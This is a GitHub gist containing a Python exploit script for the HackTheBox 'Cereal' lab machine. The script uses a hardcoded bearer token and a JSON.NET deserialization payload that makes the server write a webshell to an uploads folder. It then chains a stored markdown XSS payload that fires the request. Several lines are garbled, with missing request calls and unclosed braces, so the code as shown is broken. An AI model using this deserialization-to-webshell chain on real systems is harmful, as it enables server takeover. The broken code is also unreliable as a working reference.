Skip to content

Instantly share code, notes, and snippets.

Created June 9, 2021 05:47
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
An exploit for HTB Cereal
import sys
import requests
from urllib3.exceptions import InsecureRequestWarning
webshell_url = ''
target_url = 'https://cereal.htb/requests'
token = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2MjM4MTgwMzh9.XAcgRqhpgyJARsBMEWg1UOlUeRnQU4bvbk1SpAv3vDM'
# Set authentication header
auth_header = {
'Authorization': f'Bearer {token}'
# Serialized Cereal.DownloadHelper
# Insert serialized object to cereal.db
# Send it via cereal request.
# Input validation is on the client side,
# so the app willl just store this in serialized form
# (RequestsController.cs line 16-31)
serial_payload = {
"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"'+webshell_url+'","FilePath":"C:/inetpub/source/uploads/iamf.aspx"}'
xss_req1 =, headers=auth_header, json=serial_payload, verify=False)
if xss_req1.status_code != 200:
print('[-] Bad request')
print("[+] Serialized object sent")
request_id = xss_req1.json()['id']
print(f"[+] Triggering request at {target_url}/{request_id} with XSS")
# Triggers GET request /request/{id} via another XSS,
# The request handled by RequestsController.cs line 35-51
# superflous encode
xhr = f'''
r = new XMLHttpRequest;, %22{target_url}/{request_id}%22, false%29;
r.setRequestHeader%28%22Authorization%22, %22Bearer {token}%22%29;
'''.replace("\n", "")
trigger_payload = {
"json": f'{{"title":"[XSS](javascript: document.write`{xhr}`)","flavor":"bacon","color":"#FFF","description":"test"}}'
xss_req2 =, headers=auth_header, json=trigger_payload, verify=False)
if xss_req2.status_code != 200:
print("[-] Bad request ")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment